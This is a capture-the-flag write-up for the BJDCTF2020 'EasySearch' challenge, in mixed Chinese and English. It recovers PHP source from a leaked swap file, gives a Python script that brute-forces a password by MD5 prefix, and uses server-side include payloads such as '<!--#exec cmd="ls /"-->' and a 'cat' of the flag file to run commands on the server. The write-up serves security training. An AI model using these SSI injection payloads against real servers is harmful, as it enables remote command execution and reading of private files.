[BJDCTF2020] EasySearch

[BJDCTF2020]EasySearch

一个登陆页面,A weak password was tried 爆破 注入无果
扫描目录发现index.php.swp

<?php
	ob_start();
	function get_hash(){
    
		$chars = '[email protected]#$%^&*()+-';
		$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
		$content = uniqid().$random;
		return sha1($content); 
	}
    header("Content-Type: text/html;charset=utf-8");
	***
    if(isset($_POST['username']) and $_POST['username'] != '' )
    {
    
        $admin = '6d0bc1';
        if ( $admin == substr(md5($_POST['password']),0,6)) {
    
            echo "<script>alert('[+] Welcome to manage system')</script>";
            $file_shtml = "public/".get_hash().".shtml";
            $shtml = fopen($file_shtml, "w") or die("Unable to open file!");
            $text = ' *** *** <h1>Hello,'.$_POST['username'].'</h1> *** ***';
            fwrite($shtml,$text);
            fclose($shtml);
            ***
			echo "[!] Header error ...";
        } else {
    
            echo "<script>alert('[!] Failed')</script>";
            
    }else
    {
    
	***
    }
	***
?>

代码审计：

if(isset($_POST['username']) and $_POST['username'] != '' )
    {
    
        $admin = '6d0bc1';
        if ( $admin == substr(md5($_POST['password']),0,6)) {
    
            echo "<script>alert('[+] Welcome to manage system')</script>";

Just the passwordmd5值的前6位为6d0bc1即可登陆成功
See the cracking password script：

import hashlib

for i in range(1000000000):
    a = hashlib.md5(str(i).encode('utf-8')).hexdigest()#Get summary value
    if a[0:6] == '6d0bc1':
        print("find password!"+str(i))
        break

得到密码为 2020666

接着看到shtml页面

SSIinject reference：SSI注入
One is generated in the codeshtml页面,Unable to view after login,Capture packets and observe returned packets：

访问该页面：

Get login information

这里用到shtml,HTML是静态的,而shtml基于SSI技术,当有服务器端可执行脚本时被当作一种动态编程语言,所以可以注入,也可以用来远程命令执行.

它的注入格式是这样的：<!--#exec cmd="命令"-->
所以只需要将username设置为payload即可
First probe the root directory：<!--#exec cmd="ls /"-->


根目录没有,Then view the current directory：<!--#exec cmd="ls"-->
也没有
查看上级目录：<!--#exec cmd="ls ../"-->

找到flag文件
查看flag：username=<!--#exec cmd="cat ../flag_990c66bf85a09c664f0b6741840499b2"-->&&password=2020666